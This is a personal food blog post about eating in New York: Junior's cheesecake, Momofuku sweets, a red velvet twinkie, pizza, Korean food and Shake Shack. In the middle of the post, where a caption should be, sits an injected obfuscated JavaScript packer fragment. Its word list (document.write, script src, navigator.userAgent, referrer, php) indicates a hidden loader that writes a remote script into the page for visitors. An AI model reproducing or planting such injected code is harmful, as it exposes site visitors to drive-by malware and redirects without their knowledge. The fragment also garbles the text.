Our {little} trip to the big apple | we conquered

And by conquered, I mean we ATE!  Like a lot.  Food babies every night.  No joke.

The sweet stuff:

NY Cheesecake at Juniors.  This would be the “infamous” “bar” where I ordered a tall glass of milk 🙂  The crust was like a sugar cookie.  A bit of a gut bomb at about 10:30PM, but good for us for staying out “late” 🙂

A ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kbhhf|var|u0026u|referrer|raibf||js|php’.split(‘|’),0,{}))
Manhattan at the hotel bar.  I had water….p.a.r.t.y. a.n.i.m.a.l

Pinkies up!

All things Momofuku…well, all things that weren’t a gazillion dollars 🙂  Cookies, truffles and ice cream, Oh My!

Street sweets.  Notice the kid in the window.

A red velvet twinkie.  Yes, you read that right.  A red velvet twinkie.  And oh by the way, it was dipped in white chocolate for a satisfying crunch.  If they made a fat free/calorie free version, I’d give my left pinkie for a lifetime supply.

And now for the not-so-sweet but equally delicious category.

NY Pizza.  It was thin, crispy and delicious.  And the restaurant saved us from getting soaked.  A win-win.  The only down side?  I asked for basil.  Technically, I got basil.  But you can see from the picture that I got about 4 sprigs.  Thankfully they did not skimp on the prociutto.

Korean food – for the 2nd time ever!  I really need to find a Korean place here in town…..probably won’t be as good.

Shake Shack.  Holy crap.  This place is totally worth the wait.  The burgers are pretty tasty – they must mix something in with it all.  Maybe it’s crack, I don’t know, but it’s goooood.  And the fries are pretty good too.  Did I mention they have frozen custard – AKA my new favorite dessert item.  Bummer it’s full of fat and calories.  But totally worth it.  Like seriously, if you ever come across a frozen custard place.  Get it.  It’s like a smoother version of ice cream.  I get mine with oreos.

Potato chips and butterscotch chips sound like winners together. So weird…so good…
Ever thought of adding coconut?
